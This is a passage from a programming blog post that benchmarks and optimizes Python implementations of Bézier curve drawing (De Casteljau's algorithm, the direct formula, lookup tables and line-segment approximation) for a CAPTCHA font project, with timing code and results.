<span class="n">master</span> <span class="o">=</span> <span class="n">tkinter</span><span class="o">.</span><span class="n">Tk</span><span class="p">()</span>
<span class="n">w</span> <span class="o">=</span> <span class="n">Casteljau</span><span class="p">(</span><span class="n">master</span><span class="p">,</span> <span class="n">width</span><span class="o">=</span><span class="mi">1000</span><span class="p">,</span> <span class="n">height</span><span class="o">=</span><span class="mi">1000</span><span class="p">)</span>
<span class="n">w</span><span class="o">.</span><span class="n">pack</span><span class="p">()</span>
<span class="c1"># Finally draw some Bézier curves :)</span>
<span class="n">w</span><span class="o">.</span><span class="n">draw</span><span class="p">([(</span><span class="mi">70</span><span class="p">,</span> <span class="mi">250</span><span class="p">),</span> <span class="p">(</span><span class="mi">462</span><span class="p">,</span> <span class="mi">159</span><span class="p">),</span> <span class="p">(</span><span class="mi">0</span><span class="p">,</span> <span class="mi">0</span><span class="p">)])</span>
<span class="c1">#w.draw([(133, 267), (121, 28), (198, 270), (210, 29)])</span>
<span class="n">tkinter</span><span class="o">.</span><span class="n">mainloop</span><span class="p">()</span>
</code></pre></div>
<p>And finally the performance comparison between the two algorithms. The
direct approach wins over De Casteljau’s algorithm (I guess because
recursion is such a slowpoke), but on the other side, De Casteljau's
method is numerically stable. The direct approach is a little more than
twice as fast (This might not be accurate, since Python isn't really the
language you use for such stuff and additionally my implementation is
certainly not good enough such that I can say that any De Casteljau
algorithm implementation is exactly twice as slow as the direct
approach. These comparisons are rather a rough estimation)! Note that
the initial type checks in draw_curve() in class Casteljau were
disabled while testing the speed to avoid contortions. Furthermore, I've
shamelessly stolen the timing method from <a href="http://preshing.com/20110924/timing-your-code-using-pythons-with-statement/">this
site</a>,
using the following little class to time within <em>with</em> statements:</p>
<div class="highlight"><pre><span></span><code><span class="kn">import</span> <span class="nn">time</span>
<span class="k">class</span> <span class="nc">Timer</span><span class="p">(</span><span class="nb">object</span><span class="p">):</span>
<span class="k">def</span> <span class="fm">__init__</span><span class="p">(</span><span class="bp">self</span><span class="p">,</span> <span class="n">msg</span><span class="o">=</span><span class="s1">''</span><span class="p">,</span> <span class="n">verbose</span><span class="o">=</span><span class="kc">True</span><span class="p">):</span>
<span class="bp">self</span><span class="o">.</span><span class="n">verbose</span> <span class="o">=</span> <span class="n">verbose</span>
<span class="bp">self</span><span class="o">.</span><span class="n">msg</span> <span class="o">=</span> <span class="n">msg</span>
<span class="k">def</span> <span class="fm">__enter__</span><span class="p">(</span><span class="bp">self</span><span class="p">):</span>
<span class="bp">self</span><span class="o">.</span><span class="n">start</span> <span class="o">=</span> <span class="n">time</span><span class="o">.</span><span class="n">time</span><span class="p">()</span>
<span class="k">return</span> <span class="bp">self</span>
<span class="k">def</span> <span class="fm">__exit__</span><span class="p">(</span><span class="bp">self</span><span class="p">,</span> <span class="o">*</span><span class="n">args</span><span class="p">):</span>
<span class="bp">self</span><span class="o">.</span><span class="n">end</span> <span class="o">=</span> <span class="n">time</span><span class="o">.</span><span class="n">time</span><span class="p">()</span>
<span class="bp">self</span><span class="o">.</span><span class="n">secs</span> <span class="o">=</span> <span class="bp">self</span><span class="o">.</span><span class="n">end</span> <span class="o">-</span> <span class="bp">self</span><span class="o">.</span><span class="n">start</span>
<span class="bp">self</span><span class="o">.</span><span class="n">msecs</span> <span class="o">=</span> <span class="bp">self</span><span class="o">.</span><span class="n">secs</span> <span class="o">*</span> <span class="mi">1000</span> <span class="c1"># millisecs</span>
<span class="k">if</span> <span class="bp">self</span><span class="o">.</span><span class="n">verbose</span><span class="p">:</span>
<span class="nb">print</span><span class="p">(</span><span class="s1">'[!] </span><span class="si">%s</span><span class="s1"> - elapsed time: </span><span class="si">%f</span><span class="s1"> ms'</span> <span class="o">%</span> <span class="p">(</span><span class="bp">self</span><span class="o">.</span><span class="n">msg</span><span class="p">,</span> <span class="bp">self</span><span class="o">.</span><span class="n">msecs</span><span class="p">))</span>
</code></pre></div>
<p>Eventually the source code for the performance tests. Please consider
that it might be hard to reproduce the exact same results as below,
since the code in the github repo evolves over time:</p>
<div class="highlight"><pre><span></span><code><span class="kn">from</span> <span class="nn">timer</span> <span class="kn">import</span> <span class="n">Timer</span>
<span class="kn">from</span> <span class="nn">bezier</span> <span class="kn">import</span> <span class="n">Bezier</span> <span class="c1"># Simple bezier drawing algorithm directly derived from calculus.</span>
<span class="kn">from</span> <span class="nn">casteljau</span> <span class="kn">import</span> <span class="n">Casteljau</span> <span class="c1"># Drawing curves using de Casteljau's algorithm.</span>
<span class="kn">import</span> <span class="nn">random</span>
<span class="c1"># Overwrite Bezier class and Casteljau class to disable the GUI functions. We just want to </span>
<span class="c1"># mesure the algorithm's performance not the graphical toolkit overhead...</span>
<span class="c1"># Pre calculate random points for quadratic and cubic Bézier simulation for</span>
<span class="c1"># performance tests.</span>
<span class="n">NUMBER_OF_CURVES</span> <span class="o">=</span> <span class="mi">500</span>
<span class="n">R</span> <span class="o">=</span> <span class="n">random</span><span class="o">.</span><span class="n">randrange</span>
<span class="n">pp</span> <span class="o">=</span> <span class="p">[[(</span><span class="n">R</span><span class="p">(</span><span class="mi">500</span><span class="p">),</span> <span class="n">R</span><span class="p">(</span><span class="mi">500</span><span class="p">)),</span> <span class="p">(</span><span class="n">R</span><span class="p">(</span><span class="mi">500</span><span class="p">),</span> <span class="n">R</span><span class="p">(</span><span class="mi">500</span><span class="p">)),</span> <span class="p">(</span><span class="n">R</span><span class="p">(</span><span class="mi">500</span><span class="p">),</span> <span class="n">R</span><span class="p">(</span><span class="mi">500</span><span class="p">))]</span> <span class="k">for</span> <span class="n">i</span> <span class="ow">in</span> <span class="nb">range</span><span class="p">(</span><span class="n">NUMBER_OF_CURVES</span><span class="p">)]</span>
<span class="n">pp4</span> <span class="o">=</span> <span class="p">[[(</span><span class="n">R</span><span class="p">(</span><span class="mi">500</span><span class="p">),</span> <span class="n">R</span><span class="p">(</span><span class="mi">500</span><span class="p">)),</span> <span class="p">(</span><span class="n">R</span><span class="p">(</span><span class="mi">500</span><span class="p">),</span> <span class="n">R</span><span class="p">(</span><span class="mi">500</span><span class="p">)),</span> <span class="p">(</span><span class="n">R</span><span class="p">(</span><span class="mi">500</span><span class="p">),</span> <span class="n">R</span><span class="p">(</span><span class="mi">500</span><span class="p">)),</span> <span class="p">(</span><span class="n">R</span><span class="p">(</span><span class="mi">500</span><span class="p">),</span> <span class="n">R</span><span class="p">(</span><span class="mi">500</span><span class="p">))]</span> <span class="k">for</span> <span class="n">i</span> <span class="ow">in</span> <span class="nb">range</span><span class="p">(</span><span class="n">NUMBER_OF_CURVES</span><span class="p">)]</span>
<span class="k">class</span> <span class="nc">BezierPerf</span><span class="p">(</span><span class="n">Bezier</span><span class="p">):</span>
<span class="k">def</span> <span class="fm">__init__</span><span class="p">(</span><span class="bp">self</span><span class="p">):</span>
<span class="bp">self</span><span class="o">.</span><span class="n">test1</span><span class="p">()</span>
<span class="bp">self</span><span class="o">.</span><span class="n">test2</span><span class="p">()</span>
<span class="k">def</span> <span class="nf">plot_pixel</span><span class="p">(</span><span class="bp">self</span><span class="p">,</span> <span class="n">x0</span><span class="p">,</span> <span class="n">y0</span><span class="p">):</span>
<span class="k">pass</span> <span class="c1"># Nothin here oO</span>
<span class="k">def</span> <span class="nf">test1</span><span class="p">(</span><span class="bp">self</span><span class="p">):</span>
<span class="k">with</span> <span class="n">Timer</span><span class="p">(</span><span class="s1">'Testing quadratic bezier with direct approach'</span><span class="p">)</span> <span class="k">as</span> <span class="n">t</span><span class="p">:</span>
<span class="k">for</span> <span class="n">points</span> <span class="ow">in</span> <span class="n">pp</span><span class="p">:</span>
<span class="bp">self</span><span class="o">.</span><span class="n">draw_quadratic_bez</span><span class="p">(</span><span class="n">points</span><span class="p">[</span><span class="mi">0</span><span class="p">],</span> <span class="n">points</span><span class="p">[</span><span class="mi">1</span><span class="p">],</span> <span class="n">points</span><span class="p">[</span><span class="mi">2</span><span class="p">])</span>
<span class="k">def</span> <span class="nf">test2</span><span class="p">(</span><span class="bp">self</span><span class="p">):</span>
<span class="k">with</span> <span class="n">Timer</span><span class="p">(</span><span class="s1">'Testing cubic curves with direct approach'</span><span class="p">)</span> <span class="k">as</span> <span class="n">t</span><span class="p">:</span>
<span class="k">for</span> <span class="n">points</span> <span class="ow">in</span> <span class="n">pp4</span><span class="p">:</span>
<span class="bp">self</span><span class="o">.</span><span class="n">draw_cubic_bez</span><span class="p">(</span><span class="n">points</span><span class="p">[</span><span class="mi">0</span><span class="p">],</span> <span class="n">points</span><span class="p">[</span><span class="mi">1</span><span class="p">],</span> <span class="n">points</span><span class="p">[</span><span class="mi">2</span><span class="p">],</span> <span class="n">points</span><span class="p">[</span><span class="mi">3</span><span class="p">])</span>
<span class="k">class</span> <span class="nc">CasteljauPerf</span><span class="p">(</span><span class="n">Casteljau</span><span class="p">):</span>
<span class="k">def</span> <span class="fm">__init__</span><span class="p">(</span><span class="bp">self</span><span class="p">):</span>
<span class="bp">self</span><span class="o">.</span><span class="n">test1</span><span class="p">()</span>
<span class="bp">self</span><span class="o">.</span><span class="n">test2</span><span class="p">()</span>
<span class="k">def</span> <span class="nf">plot_pixel</span><span class="p">(</span><span class="bp">self</span><span class="p">,</span> <span class="n">x0</span><span class="p">,</span> <span class="n">y0</span><span class="p">):</span>
<span class="k">pass</span> <span class="c1"># No drawing please.</span>
<span class="k">def</span> <span class="nf">test1</span><span class="p">(</span><span class="bp">self</span><span class="p">):</span>
<span class="k">with</span> <span class="n">Timer</span><span class="p">(</span><span class="s1">'Testing quadratic bezier curves with De Casteljau'</span><span class="p">)</span> <span class="k">as</span> <span class="n">t</span><span class="p">:</span>
<span class="k">for</span> <span class="n">points</span> <span class="ow">in</span> <span class="n">pp</span><span class="p">:</span>
<span class="bp">self</span><span class="o">.</span><span class="n">draw</span><span class="p">(</span><span class="n">points</span><span class="p">)</span>
<span class="k">def</span> <span class="nf">test2</span><span class="p">(</span><span class="bp">self</span><span class="p">):</span>
<span class="k">with</span> <span class="n">Timer</span><span class="p">(</span><span class="s1">'Testing cubic bezier curves with De Casteljau'</span><span class="p">)</span> <span class="k">as</span> <span class="n">t</span><span class="p">:</span>
<span class="k">for</span> <span class="n">points</span> <span class="ow">in</span> <span class="n">pp4</span><span class="p">:</span>
<span class="bp">self</span><span class="o">.</span><span class="n">draw</span><span class="p">(</span><span class="n">points</span><span class="p">)</span>
<span class="k">if</span> <span class="vm">__name__</span> <span class="o">==</span> <span class="s1">'__main__'</span><span class="p">:</span>
<span class="n">test2</span> <span class="o">=</span> <span class="n">CasteljauPerf</span><span class="p">()</span>
<span class="n">test</span> <span class="o">=</span> <span class="n">BezierPerf</span><span class="p">()</span>
</code></pre></div>
<p>The above timing yields this output: </p>
<p><code>[nikolai@niko-arch python_tests]$ python performance_tests.py [!] Testing quadratic bezier curves with De Casteljau - elapsed time: 5814.155579 ms [!] Testing cubic bezier curves with De Casteljau - elapsed time: 9396.822453 ms [!] Testing quadratic bezier with direct approach - elapsed time: 1528.661489 ms [!] Testing cubic curves with direct approach - elapsed time: 2135.466337 ms</code></p>
<h3>Optimizing</h3>
<p>When it comes to optimization, one can go almost infinitely deep and
far. There's a huge amount of scientific research and work invested,
because saving CPU power means saving money. For instance, in compiler
development, the optimization part constitutes the most complex and
work-intense part (If I remember my coursera lessons correctly). I
instead will only scratch on the surface and won't dive into the depths
of optimizing (Well these metaphors combined is utterly strange ;))<br>
I will tune the direct algorithm, because it is just faster then De
Casteljau's recursive approach.</p>
<p>Some concepts (and common sense):</p>
<ul>
<li><em>Avoid double calculations.</em> Have a look at the Code above (or <a href="https://github.com/NikolaiT/CunningCaptcha/blob/master/python_tests/bezier.py">on
github</a>).
The functions <code>quadratic_bezier_sum</code> and <code>cubic_bezier_sum</code> are
called twice for the x and the y coordinate. But this means that the
coefficients of the equation are also calculated twice, although we
could just compute them once and reuse them for the other
coordinates (In our case just for the y coordinate). Eliminate this
problem through incorporating the function's logic directly into the
calle's context, namely into the methods
<code>draw_(quadratic|cubic)_bezier_sum</code>. This brings us directly to the
second point...</li>
<li>
<p><em>Spare on function calls.</em> Function calls are a nice way to separate
concepts logically and organize your code (structural/imperative
programming) but you should't use them excessively in time critical
code. But why? Function calls mean new call stacks. And each
operation in the ram/stack is at least 100 times slower than using
CPU registers directly. This is also the reason why recursion is so
inefficient (Recursion=many many stack frames). To readopt the
example above: When we integrate the functions
quadratic_bezier_sum and <code>cubic_bezier_sum</code> into the calling
functions we eliminate exactly 1000 functions calls (Assuming we
increase the parameter t in each loop by 0.001). Further, this means
we spare 500'000 function calls when we draw 500 splines. So
remember: Don't implement too many function calls inside the body of
the loops. You can examine the updated function called
<code>_draw_(quadratic|cubic)_bez</code> on github
<a href="https://github.com/NikolaiT/CunningCaptcha/blob/master/python_tests/geoprim.py">here</a>
The preliminary and this aspect together brings us the following
performance boost over the inefficient code at the start of this
post: </p>
<p><code>[+] Testing task is to draw 500 randomly generated Bézier splines with different algorithms. Approximation uses 20 segments. [!] Testing unoptimized quadratic bezier with direct approach - elapsed time: 2512.458563 ms [!] Testing unoptimized cubic curves with direct approach - elapsed time: 3192.077160 ms [!] Testing quadratic bezier curves with direct approach - elapsed time: 2277.250528 ms [!] Testing cubic bezier curves with direct approach - elapsed time: 2857.527494 ms</code><br>
That's after all a 11% performance increase! Not bad for a start :)
- <em>Be aware of multiplications/divisions.</em>The more operations you can
eliminate, the better. Usually, multiplications are slower than
additions, so you might try to algebraically simplify your
calculations of find other ways to use less arithmetic operations.
In my case there would be a technique called fast forward
differencing with using Taylor series. This technique is especially
nice when you want to speedup the rasterization of big, complex
splines but diminishes when you need to draw many comparable simple
curves, as I do in my font project. Therefore I won't make use of
it. However, if you want to learn it, <a href="http://scratchapixel.com/lessons/3d-basic-lessons/lesson-11-rendering-the-teapot-bezier-surfaces/fast-forward-differencing/">here you
go.</a>
- <em>Precalculate stuff</em> Just use look-up tables. Especially in my case,
look-up tables will help to speed up the algorithms a great deal.
This means, I will precompute all coefficients for the Bézier
splines (3 coefficients in case of quadratic splines, 4 in case of
cubic curves). Suppose I am going too draw 500 cubic Bézier curves,
and each curve consists of 1000 points. Accordingly the algorithm
will calculate a matrix of 1000 entries and each entry consists of
the 4 coefficients (3 respectively when plotting quadratic splines).
That's around <code>4*8*1000=32kb</code> of data of RAM too hold all possible
coefficients, not really much on a average 6-8 GB built-in RAM
nowadays ;). Here is the relevant code excerpt that shows the
generation of the look-up table:</p>
<div class="highlight"><pre><span></span><code><span class="k">def</span> <span class="nf">_quadratic_bez_lut</span><span class="p">(</span><span class="bp">self</span><span class="p">,</span> <span class="n">p1</span><span class="p">,</span> <span class="n">p2</span><span class="p">,</span> <span class="n">p3</span><span class="p">):</span>
<span class="n">t</span> <span class="o">=</span> <span class="mi">0</span>
<span class="k">if</span> <span class="ow">not</span> <span class="bp">self</span><span class="o">.</span><span class="n">_LUT_Q</span><span class="p">:</span>
<span class="c1">#print('[i] lut generating for quadratic splines...')</span>
<span class="k">while</span> <span class="p">(</span><span class="n">t</span> <span class="o"><</span> <span class="mi">1</span><span class="p">):</span>
<span class="n">t2</span> <span class="o">=</span> <span class="n">t</span><span class="o">*</span><span class="n">t</span>
<span class="n">mt</span> <span class="o">=</span> <span class="mi">1</span><span class="o">-</span><span class="n">t</span>
<span class="n">mt2</span> <span class="o">=</span> <span class="n">mt</span><span class="o">*</span><span class="n">mt</span>
<span class="bp">self</span><span class="o">.</span><span class="n">_LUT_Q</span><span class="p">[</span><span class="n">t</span><span class="p">]</span> <span class="o">=</span> <span class="p">(</span><span class="n">mt2</span><span class="p">,</span> <span class="mi">2</span><span class="o">*</span><span class="n">mt</span><span class="o">*</span><span class="n">t</span><span class="p">,</span> <span class="n">t2</span><span class="p">)</span>
<span class="n">t</span> <span class="o">+=</span> <span class="bp">self</span><span class="o">.</span><span class="n">_STEP</span>
<span class="k">for</span> <span class="n">v</span> <span class="ow">in</span> <span class="bp">self</span><span class="o">.</span><span class="n">_LUT_Q</span><span class="o">.</span><span class="n">values</span><span class="p">():</span>
<span class="n">x</span><span class="p">,</span> <span class="n">y</span> <span class="o">=</span> <span class="nb">int</span><span class="p">(</span><span class="n">p1</span><span class="o">.</span><span class="n">x</span><span class="o">*</span><span class="n">v</span><span class="p">[</span><span class="mi">0</span><span class="p">]</span> <span class="o">+</span> <span class="n">p2</span><span class="o">.</span><span class="n">x</span><span class="o">*</span><span class="n">v</span><span class="p">[</span><span class="mi">1</span><span class="p">]</span> <span class="o">+</span> <span class="n">p3</span><span class="o">.</span><span class="n">x</span><span class="o">*</span><span class="n">v</span><span class="p">[</span><span class="mi">2</span><span class="p">]),</span> <span class="nb">int</span><span class="p">(</span><span class="n">p1</span><span class="o">.</span><span class="n">y</span><span class="o">*</span><span class="n">v</span><span class="p">[</span><span class="mi">0</span><span class="p">]</span> <span class="o">+</span> <span class="n">p2</span><span class="o">.</span><span class="n">y</span><span class="o">*</span><span class="n">v</span><span class="p">[</span><span class="mi">1</span><span class="p">]</span> <span class="o">+</span> <span class="n">p3</span><span class="o">.</span><span class="n">y</span><span class="o">*</span><span class="n">v</span><span class="p">[</span><span class="mi">2</span><span class="p">])</span>
<span class="bp">self</span><span class="o">.</span><span class="n">_plot_pixel</span><span class="p">(</span><span class="n">x</span><span class="p">,</span> <span class="n">y</span><span class="p">)</span>
<span class="k">def</span> <span class="nf">_cubic_bez_lut</span><span class="p">(</span><span class="bp">self</span><span class="p">,</span> <span class="n">p1</span><span class="p">,</span> <span class="n">p2</span><span class="p">,</span> <span class="n">p3</span><span class="p">,</span> <span class="n">p4</span><span class="p">):</span>
<span class="n">t</span> <span class="o">=</span> <span class="mi">0</span>
<span class="k">if</span> <span class="ow">not</span> <span class="bp">self</span><span class="o">.</span><span class="n">_LUT_C</span><span class="p">:</span>
<span class="c1">#print('[i] lut generating for cubic splines...')</span>
<span class="k">while</span> <span class="p">(</span><span class="n">t</span> <span class="o"><</span> <span class="mi">1</span><span class="p">):</span>
<span class="n">t2</span> <span class="o">=</span> <span class="n">t</span><span class="o">*</span><span class="n">t</span>
<span class="n">t3</span> <span class="o">=</span> <span class="n">t2</span><span class="o">*</span><span class="n">t</span>
<span class="n">mt</span> <span class="o">=</span> <span class="mi">1</span><span class="o">-</span><span class="n">t</span>
<span class="n">mt2</span> <span class="o">=</span> <span class="n">mt</span><span class="o">*</span><span class="n">mt</span>
<span class="n">mt3</span> <span class="o">=</span> <span class="n">mt2</span><span class="o">*</span><span class="n">mt</span>
<span class="bp">self</span><span class="o">.</span><span class="n">_LUT_C</span><span class="p">[</span><span class="n">t</span><span class="p">]</span> <span class="o">=</span> <span class="p">(</span><span class="n">mt3</span><span class="p">,</span> <span class="mi">3</span><span class="o">*</span><span class="n">mt2</span><span class="o">*</span><span class="n">t</span><span class="p">,</span> <span class="mi">3</span><span class="o">*</span><span class="n">mt</span><span class="o">*</span><span class="n">t2</span><span class="p">,</span> <span class="n">t3</span><span class="p">)</span>
<span class="n">t</span> <span class="o">+=</span> <span class="bp">self</span><span class="o">.</span><span class="n">_STEP</span>
<span class="k">for</span> <span class="n">v</span> <span class="ow">in</span> <span class="bp">self</span><span class="o">.</span><span class="n">_LUT_C</span><span class="o">.</span><span class="n">values</span><span class="p">():</span>
<span class="n">x</span><span class="p">,</span> <span class="n">y</span> <span class="o">=</span> <span class="nb">int</span><span class="p">(</span><span class="n">p1</span><span class="o">.</span><span class="n">x</span><span class="o">*</span><span class="n">v</span><span class="p">[</span><span class="mi">0</span><span class="p">]</span> <span class="o">+</span> <span class="n">p2</span><span class="o">.</span><span class="n">x</span><span class="o">*</span><span class="n">v</span><span class="p">[</span><span class="mi">1</span><span class="p">]</span> <span class="o">+</span> <span class="n">p3</span><span class="o">.</span><span class="n">x</span><span class="o">*</span><span class="n">v</span><span class="p">[</span><span class="mi">2</span><span class="p">]</span> <span class="o">+</span> <span class="n">p4</span><span class="o">.</span><span class="n">x</span><span class="o">*</span><span class="n">v</span><span class="p">[</span><span class="mi">3</span><span class="p">]),</span> <span class="nb">int</span><span class="p">(</span><span class="n">p1</span><span class="o">.</span><span class="n">y</span><span class="o">*</span><span class="n">v</span><span class="p">[</span><span class="mi">0</span><span class="p">]</span> <span class="o">+</span> <span class="n">p2</span><span class="o">.</span><span class="n">y</span><span class="o">*</span><span class="n">v</span><span class="p">[</span><span class="mi">1</span><span class="p">]</span> <span class="o">+</span> <span class="n">p3</span><span class="o">.</span><span class="n">y</span><span class="o">*</span><span class="n">v</span><span class="p">[</span><span class="mi">2</span><span class="p">]</span> <span class="o">+</span> <span class="n">p4</span><span class="o">.</span><span class="n">y</span><span class="o">*</span><span class="n">v</span><span class="p">[</span><span class="mi">3</span><span class="p">])</span>
<span class="bp">self</span><span class="o">.</span><span class="n">_plot_pixel</span><span class="p">(</span><span class="n">x</span><span class="p">,</span> <span class="n">y</span><span class="p">)</span>
</code></pre></div>
<p>.<br>
And here you see the performance results: </p>
<p><code>[+] Testing task is to draw 500 randomly generated Bézier splines with different algorithms. Approximation uses 20 segments. [!] Testing quadratic bezier curves with direct approach - elapsed time: 2320.041656 ms [!] Testing cubic bezier curves with direct approach - elapsed time: 2830.367804 ms [!] Testing quadratic bezier curves with lookup tables - elapsed time: 1840.610504 ms [!] Testing cubic bezier curves with lookup tables - elapsed time: 2220.727682 ms</code><br>
This means we get another 30% performance boost (quadratic and
cubic computations scale linearly percent wise)! Honestly, I
expected more of using look-up tables. Please leave a comment in
case I implemented them wrong.</p>
</li>
<li>
<p><em>Approximate</em> Why even calculating 1000 Points? Usually you can't
even appreciate the smoothness of such a curve, because the splines
are just not big enough in the end (For instance in the final
captcha), performance however is always good to have ;) That being
said, I will proceed as follows: Instead of iterating 1000 times, I
will simply iterate 15 times and thus evaluate the Bézier equation
only 15 times. Then I will just connect these 15 points with
straight lines. Let's see how fast all the previous techniques and
this combined will make the algorithm (Note that the precalculating
trick and the approximation intersect performance wise, because now
the look-up table is not anywhere as useful as before, since we
evaluate the equation only 15 times). Here's the updated code
together with the final performance results. First the approximation
code:</p>
<div class="highlight"><pre><span></span><code><span class="k">def</span> <span class="nf">_approx_quadratic_bez</span><span class="p">(</span><span class="bp">self</span><span class="p">,</span> <span class="n">p1</span><span class="p">,</span> <span class="n">p2</span><span class="p">,</span> <span class="n">p3</span><span class="p">):</span>
<span class="n">lp</span> <span class="o">=</span> <span class="p">[]</span>
<span class="n">lp</span><span class="o">.</span><span class="n">append</span><span class="p">(</span><span class="n">p1</span><span class="p">)</span>
<span class="k">for</span> <span class="n">i</span> <span class="ow">in</span> <span class="nb">range</span><span class="p">(</span><span class="bp">self</span><span class="o">.</span><span class="n">_NUM_SEGMENTS</span><span class="p">):</span>
<span class="n">t</span> <span class="o">=</span> <span class="n">i</span> <span class="o">/</span> <span class="bp">self</span><span class="o">.</span><span class="n">_NUM_SEGMENTS</span>
<span class="n">t2</span> <span class="o">=</span> <span class="n">t</span><span class="o">*</span><span class="n">t</span>
<span class="n">mt</span> <span class="o">=</span> <span class="mi">1</span><span class="o">-</span><span class="n">t</span>
<span class="n">mt2</span> <span class="o">=</span> <span class="n">mt</span><span class="o">*</span><span class="n">mt</span>
<span class="n">x</span><span class="p">,</span> <span class="n">y</span> <span class="o">=</span> <span class="nb">int</span><span class="p">(</span><span class="n">p1</span><span class="o">.</span><span class="n">x</span><span class="o">*</span><span class="n">mt2</span> <span class="o">+</span> <span class="n">p2</span><span class="o">.</span><span class="n">x</span><span class="o">*</span><span class="mi">2</span><span class="o">*</span><span class="n">mt</span><span class="o">*</span><span class="n">t</span> <span class="o">+</span> <span class="n">p3</span><span class="o">.</span><span class="n">x</span><span class="o">*</span><span class="n">t2</span><span class="p">),</span> <span class="nb">int</span><span class="p">(</span><span class="n">p1</span><span class="o">.</span><span class="n">y</span><span class="o">*</span><span class="n">mt2</span> <span class="o">+</span> <span class="n">p2</span><span class="o">.</span><span class="n">y</span><span class="o">*</span><span class="mi">2</span><span class="o">*</span><span class="n">mt</span><span class="o">*</span><span class="n">t</span> <span class="o">+</span> <span class="n">p3</span><span class="o">.</span><span class="n">y</span><span class="o">*</span><span class="n">t2</span><span class="p">)</span>
<span class="n">lp</span><span class="o">.</span><span class="n">append</span><span class="p">(</span><span class="n">Point</span><span class="p">(</span><span class="n">x</span><span class="p">,</span><span class="n">y</span><span class="p">))</span>
<span class="k">for</span> <span class="n">i</span> <span class="ow">in</span> <span class="nb">range</span><span class="p">(</span><span class="nb">len</span><span class="p">(</span><span class="n">lp</span><span class="p">)</span><span class="o">-</span><span class="mi">1</span><span class="p">):</span>
<span class="bp">self</span><span class="o">.</span><span class="n">line</span><span class="p">([</span><span class="n">lp</span><span class="p">[</span><span class="n">i</span><span class="p">],</span> <span class="n">lp</span><span class="p">[</span><span class="n">i</span><span class="o">+</span><span class="mi">1</span><span class="p">]])</span>
<span class="k">def</span> <span class="nf">_approx_cubic_bez</span><span class="p">(</span><span class="bp">self</span><span class="p">,</span> <span class="n">p1</span><span class="p">,</span> <span class="n">p2</span><span class="p">,</span> <span class="n">p3</span><span class="p">,</span> <span class="n">p4</span><span class="p">):</span>
<span class="n">lp</span> <span class="o">=</span> <span class="p">[]</span>
<span class="n">lp</span><span class="o">.</span><span class="n">append</span><span class="p">(</span><span class="n">p1</span><span class="p">)</span>
<span class="k">for</span> <span class="n">i</span> <span class="ow">in</span> <span class="nb">range</span><span class="p">(</span><span class="bp">self</span><span class="o">.</span><span class="n">_NUM_SEGMENTS</span><span class="p">):</span>
<span class="n">t</span> <span class="o">=</span> <span class="n">i</span> <span class="o">/</span> <span class="bp">self</span><span class="o">.</span><span class="n">_NUM_SEGMENTS</span>
<span class="n">t2</span> <span class="o">=</span> <span class="n">t</span> <span class="o">*</span> <span class="n">t</span>
<span class="n">t3</span> <span class="o">=</span> <span class="n">t2</span> <span class="o">*</span> <span class="n">t</span>
<span class="n">mt</span> <span class="o">=</span> <span class="mi">1</span><span class="o">-</span><span class="n">t</span>
<span class="n">mt2</span> <span class="o">=</span> <span class="n">mt</span> <span class="o">*</span> <span class="n">mt</span>
<span class="n">mt3</span> <span class="o">=</span> <span class="n">mt2</span> <span class="o">*</span> <span class="n">mt</span>
<span class="n">x</span><span class="p">,</span> <span class="n">y</span> <span class="o">=</span> <span class="nb">int</span><span class="p">(</span><span class="n">p1</span><span class="o">.</span><span class="n">x</span><span class="o">*</span><span class="n">mt3</span> <span class="o">+</span> <span class="mi">3</span><span class="o">*</span><span class="n">p2</span><span class="o">.</span><span class="n">x</span><span class="o">*</span><span class="n">mt2</span><span class="o">*</span><span class="n">t</span> <span class="o">+</span> <span class="mi">3</span><span class="o">*</span><span class="n">p3</span><span class="o">.</span><span class="n">x</span><span class="o">*</span><span class="n">mt</span><span class="o">*</span><span class="n">t2</span> <span class="o">+</span> <span class="n">p4</span><span class="o">.</span><span class="n">x</span><span class="o">*</span><span class="n">t3</span><span class="p">),</span> <span class="nb">int</span><span class="p">(</span><span class="n">p1</span><span class="o">.</span><span class="n">y</span><span class="o">*</span><span class="n">mt3</span> <span class="o">+</span> <span class="mi">3</span><span class="o">*</span><span class="n">p2</span><span class="o">.</span><span class="n">y</span><span class="o">*</span><span class="n">mt2</span><span class="o">*</span><span class="n">t</span> <span class="o">+</span> <span class="mi">3</span><span class="o">*</span><span class="n">p3</span><span class="o">.</span><span class="n">y</span><span class="o">*</span><span class="n">mt</span><span class="o">*</span><span class="n">t2</span> <span class="o">+</span> <span class="n">p4</span><span class="o">.</span><span class="n">y</span><span class="o">*</span><span class="n">t3</span><span class="p">)</span>
<span class="n">lp</span><span class="o">.</span><span class="n">append</span><span class="p">(</span><span class="n">Point</span><span class="p">(</span><span class="n">x</span><span class="p">,</span><span class="n">y</span><span class="p">))</span>
<span class="k">for</span> <span class="n">i</span> <span class="ow">in</span> <span class="nb">range</span><span class="p">(</span><span class="nb">len</span><span class="p">(</span><span class="n">lp</span><span class="p">)</span><span class="o">-</span><span class="mi">1</span><span class="p">):</span>
<span class="bp">self</span><span class="o">.</span><span class="n">line</span><span class="p">([</span><span class="n">lp</span><span class="p">[</span><span class="n">i</span><span class="p">],</span> <span class="n">lp</span><span class="p">[</span><span class="n">i</span><span class="o">+</span><span class="mi">1</span><span class="p">]])</span>
</code></pre></div>
<p>And now all performance results together: </p>
<p><code>[+] Testing task is to draw 500 randomly generated Bézier splines with different algorithms. Approximation uses 20 segments. [!] Testing quadratic bezier curves with De Casteljaus algorithm - elapsed time: 7362.981081 ms [!] Testing cubic bezier curves with De Casteljaus algorithm - elapsed time: 11826.589823 ms [!] Testing unoptimized quadratic bezier with direct approach - elapsed time: 2533.061028 ms [!] Testing unoptimized cubic curves with direct approach - elapsed time: 3126.898527 ms [!] Testing quadratic bezier curves with direct approach - elapsed time: 2231.390953 ms [!] Testing cubic bezier curves with direct approach - elapsed time: 2773.490906 ms [!] Testing quadratic bezier curves with lookup tables - elapsed time: 1845.245123 ms [!] Testing cubic bezier curves with lookup tables - elapsed time: 2269.758940 ms [!] Testing quadratic bezier curves with approximation - elapsed time: 252.831936 ms [!] Testing cubic bezier curves with approximation - elapsed time: 286.973476 ms</code><br>
BOOM! The approximation needs stunning 287 milliseconds to plot 500
random cubic Bézier splines, whereas De Casteljaus algorithm takes
12 Seconds! That's 42 times faster! You say the approximation looks
ugly? Maybe your right, but for my purposes it's certainly enough.
Here's a picture of a spline plotted with the approximation method
(on the left) and De Casteljau's algorithm (on the right). In my
opinion there is no big difference (From this perspective, and for
the captcha purposes it is really enough resolution).<br>
[<img alt="Comparison" src="https://incolumitas.com/uploads/2013/10/approx_vs_castel-1024x576.png">
Both splines are identical. On the left is the curve approximated
(fast) and on the right drawn with De Casteljau's algorithm
(slow).</p>
